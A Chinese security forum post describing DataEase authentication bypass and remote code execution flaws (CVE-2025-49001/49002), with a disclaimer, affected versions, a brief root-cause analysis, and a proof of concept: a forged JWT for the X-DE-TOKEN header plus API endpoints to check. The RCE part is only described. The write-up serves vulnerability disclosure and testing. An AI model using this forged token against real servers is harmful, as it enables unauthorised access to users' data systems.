Dataease JWT 认证绕过漏洞/远程代码执行-网络安全论坛-网络安全-阻击者联盟

Dataease JWT 认证绕过漏洞/远程代码执行

(CVE-2025-49001/CVE-2025-49002)

免责声明

       请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞介绍

DataEase 是一款开源的数据分析平台,提供丰富的数据可视化和分析功能,帮助用户轻松地进行数据探索和决策支持,CVE-2025-49001 是由于JWT校验机制错误导致攻击者可伪造JWT令牌绕过身份验证流程,CVE-2025-49002 是由于H2数据库模块没有严格过滤用户输入的JDBC连接参数,可使用大小写绕过补丁。攻击者可利用这些漏洞实现未授权代码执行,威胁用户数据和系统的安全。

影响版本

DataEase <= 2.10.8

漏洞复现

CVE-2025-49001 

d2b5ca33bd20250609110011

POC:

X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8

可以通过请求以下接口进行验证,无漏洞则会返回500或401

/de2api/license/version
/de2api/user/info
/de2api/login/refresh

d2b5ca33bd20250609110042

d2b5ca33bd20250609110047

漏洞分析

CVE-2025-49001 

通过 JWT 解密了 token,获取了 uid 和 oid 的值,并没有使用当前秘钥来验证 token 的合法性,可以使用任意secret来伪造一个符合以下格式的JWT token

{
  "uid": 1,
  "oid": 1
}

 

请登录后发表评论

    没有回复内容